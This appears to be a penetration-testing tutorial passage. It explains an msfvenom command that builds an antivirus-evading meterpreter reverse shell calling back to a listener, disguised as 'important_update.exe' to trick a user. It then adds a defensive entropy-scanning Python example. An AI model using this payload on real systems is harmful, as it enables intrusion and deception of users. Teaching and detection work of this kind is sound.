Commands
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -f exe LHOST=192.168.10.50 LPORT=8080 > ~/Desktop/important_update.exe
- msfvenom: msfvenom is a tool from the Metasploit framework that combines the functionality of msfpayload and msfencode. It's able to backdoor legitimate files and encode them for things such as AV evasion. It can craft payloads for pretty much any platform, and any format.
- -p windows/meterpreter/reverse_tcp: This tells msfvenom what to use for a payload. In this case, we're using the standard meterpreter reverse shell, which will pop a shell on the remote host and connect back to a listener that we have running.
- -e x86/shikata_ga_nai -i 5: This tells msfvenom to encode the payload using the shikata_ga_nai encoder. This is one of the better encoders included with the Metasploit framework, and is very helpful with evading AV. If the payload isn't encoded, AV will be able to detect the meterpreter shellcode. The -i 5 flag tells msfvenom to run five iterations of the encoder. Sometimes the encoder fails to execute all the iterations; run it again, however, and eventually it will succeed.
- -f exe: This flag says that we would like to encode our payload as a standard Windows executable. This isn't necessary, but it does allow us to see that msfvenom can produce many different types of output, including Perl, Ruby, Python, exe, Java, DLLs, and many more.
- LHOST=192.168.10.50 LPORT=8080: These are options specific to the meterpreter payload that we've chosen here. This will set the reverse shell to connect back to our listener at 192.168.10.50 and use port 8080.
- > ~/Desktop/important_update.exe: This will output the result from msfvenom to a file of our choosing. In this case, we're using important_update.exe. Our poor user Bob will, of course, choose to open this file, because he knows that it's important to keep his computer updated:
As you can see from the preceding screenshot, I generated the exploit on a desktop folder and I named it important_update.exe.
The next step is to set up the listener on our attacking computer by using a multi-handler.
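The encoding step above is meant to defeat byte-signature matching, and the defender's complementary observation is that a payload run through several encoder iterations looks close to random. The following Python is an added example, not code from the book: it scores Shannon entropy over sliding windows of a constructed buffer (readable text, a deterministic pseudo-random blob standing in for an encoded payload, and zero padding) and reports the windows that look encoded.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a perfectly uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = 512, step: int = 256,
                         threshold: float = 7.0):
    """Return (offset, entropy) for every window whose entropy reaches the threshold.

    Plain code and strings in a PE usually score well below 7 bits/byte; compressed,
    encrypted or multiply-encoded regions sit near the top of the scale.
    """
    hits = []
    for off in range(0, max(len(data) - window, 0) + 1, step):
        e = shannon_entropy(data[off:off + window])
        if e >= threshold:
            hits.append((off, round(e, 2)))
    return hits


def pseudo_random_bytes(n: int, seed: bytes = b"constructed-seed") -> bytes:
    """Deterministic filler (chained SHA-256) standing in for encoded shellcode."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


# Constructed sample, not a real binary: 2048 bytes of readable text,
# a 1024-byte "encoded" blob at offset 2048, then 2048 bytes of zero padding.
PLAIN = (b"Ordinary readable program text. " * 64)[:2048]
SAMPLE = PLAIN + pseudo_random_bytes(1024) + b"\x00" * 2048


def scan_sample():
    """Windows of SAMPLE that an entropy heuristic would flag for closer inspection."""
    return high_entropy_windows(SAMPLE)


if __name__ == "__main__":
    for off, e in scan_sample():
        print(f"offset 0x{off:05x}: entropy {e} bits/byte")
```

Only windows overlapping the blob are flagged; the text and padding score far lower. In practice the same scoring is applied per PE section, where a high-entropy executable section is a common trigger for deeper analysis.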